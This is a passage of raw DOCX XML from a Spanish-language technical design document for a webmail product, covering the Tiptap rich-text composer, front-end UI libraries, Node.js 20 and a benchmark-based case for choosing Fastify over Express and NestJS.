        </w:rPr>
        <w:t xml:space="preserve">Tabs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) que manejan automáticamente ARIA attributes, focus trapping y portales —requisitos críticos para un webmail donde la navegación por teclado (atajos tipo Gmail: G+C para compose, R para reply, F para forward) es una expectativa de usuario, no un feature opcional.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="tiptap-2-prosemirror"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.7 Tiptap 2 (ProseMirror)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tiptap 2.4, wrapper extensible del motor de edición ProseMirror, potencia el compositor de emails. ProseMirror proporciona el modelo de documento basado en un árbol de nodos inmutable, garantizando que el HTML generado esté siempre bien formado —una propiedad de seguridad relevante dado que el HTML malformado es vector de bypass en motores de sanitización. Tiptap añade extensiones declarativas:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">StarterKit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Image</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Placeholder</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Mention</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Collaboration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(para edición concurrente de borradores), y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BubbleMenu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para formato inline. El compositor soporta los tres modos de contenido: texto plano, HTML enriquecido, y Markdown (vía</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@tiptap/extension-markdown</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), con conversión automática entre formatos según la configuración de la cuenta destino.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="44" w:name="X33e52990c085d7edbb8908fa9a6a1e1544d05c7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.1.8 Componentes UI: three-pane layout, virtual scrolling, drag-and-drop</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los componentes de interfaz críticos se implementan con las siguientes librerías especializadas:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1793"/>
        <w:gridCol w:w="1494"/>
        <w:gridCol w:w="1344"/>
        <w:gridCol w:w="3287"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Componente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Librería</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Versión</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Justificación técnica</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Virtual scrolling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@vueuse/core</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">useVirtualList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Renderizado de listas &gt;10k items sin DOM overflow; reciclaje de nodos DOM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Drag-and-drop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">@vueuse/gesture</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">o SortableJS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1.x / 1.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reordenación de carpetas IMAP y arrastre de emails entre carpetas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Three-pane layout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CSS Grid + Pinia state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Layout sidebar + lista + lectura; colapsable en viewports &lt;1280px</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Date formatting</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">date-fns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">3.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2 KB por locale; tree-shakeable; superior a moment.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Iconografía</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">lucide-vue-next</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Iconos SVG stroke-based; tree-shakeable; ~1300 iconos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Notificaciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">vue-sonner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Toasts para confirmaciones de envío y errores de sincronización</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Selección múltiple</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ctrl/Cmd + Shift + click nativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bulk actions: archive, delete, mark-as-read, mover a carpeta</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La combinación de estos componentes produce una interfaz que replica los patrones de interacción consolidados por Gmail —three-pane layout, selección múltiple con checkboxes, drag-and-drop de emails a carpetas, y virtual scrolling para inboxes de alto volumen— sin asumir la carga de una librería de componentes monolítica como Vuetify o Element Plus, cuyo tree-shaking es imperfecto y cuyos tamaños de bundle superan los 200 KB gzipped.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="53" w:name="backend"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2 Backend</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="46" w:name="node.js-20-lts"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.1 Node.js 20 LTS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Node.js 20.15 LTS (codename</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Iron</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, soporte hasta abril de 2026, extendido por el ciclo LTS hasta abril 2027) es la plataforma de ejecución. La versión 20 aporta mejoras relevantes: el permiso del modelo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--experimental-permission</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) para restringir acceso a sistema de archivos y redes, el stable test runner nativo (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">node:test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), y el incremento de rendimiento del 10-15% en operaciones de stream y buffer comparado con Node.js 18, medido en benchmarks del equipo Node.js para cargas de I/O intensiva. Para un webmail que procesa streams MIME, buffers de adjuntos y conexiones IMAP persistentes, estas mejoras son materialmente significativas.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="46"/>
    <w:bookmarkStart w:id="47" w:name="fastify-4-2-3x-más-rápido-que-express"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.2.2 Fastify 4 — 2-3x más rápido que Express</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fastify 4.28 es el framework HTTP seleccionado sobre Express 5 y NestJS 11. La decisión se fundamenta en benchmarks controlados: Express maneja ~6.150 req/s frente a ~14.460 req/s de Fastify bajo las mismas condiciones (100 conexiones concurrentes, 10 segundos, Autocannon)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Otros benchmarks reportan Fastify procesando 70.000-80.000 req/s comparado con 20.000-30.000 de Express</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[133]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dos características arquitectónicas de Fastify son determinantes para Webmail 6.0. Primero,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fast-json-stringify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">serializa respuestas JSON hasta 2x más rápido que</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON.stringify</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nativo, mediante schemas de validación declarativos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Segundo, el router</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">find-my-way</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(basado en trie) es ~3x más rápido que el router regex-based de Express</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[130]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El sistema de plugins de Fastify ofrece encapsulación nativa: cada plugin (IMAP, SMTP, calendario, autenticación) posee su propio scope, evitando que decoradores y middlewares se filtren entre rutas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[128]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Esta modularidad permite dividir la aplicación en microservicios sin refactorización mayor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[149]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una nota de cautela proviene de un estudio académico de la Universidad de Uppsala bajo carga extrema (10.000 VUs), donde NestJS demostró mayor estabilidad que Fastify en escenarios de saturación</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[134]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La resolución de este conflicto es contextual: Fastify gana en throughput normal; bajo saturación extrema, NestJS con adapter Fastify puede ofrecer mayor estabilidad. Para el perfil de carga de un webmail —bajo volumen de requests por usuario pero larga duración de sesiones— Fastify puro es la elección óptima.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="898"/>
        <w:gridCol w:w="1551"/>
        <w:gridCol w:w="1143"/>
        <w:gridCol w:w="1551"/>
        <w:gridCol w:w="1551"/>
        <w:gridCol w:w="1224"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Throughput (req/s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Latencia p50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Serialización JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sistema de plugins</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Encapsulación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Express 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~6.150</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[130]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~16ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">JSON.stringify nativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Middleware global</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ninguna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Fastify 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~14.460</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[130]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~7ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">fast-json-stringify (2x)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[130]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Encapsulado nativo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Por plugin</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[128]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">NestJS 11+Fastify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~15.000-18.000</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">[131]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">~6ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">class-transformer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Módulos DI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Por módulo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
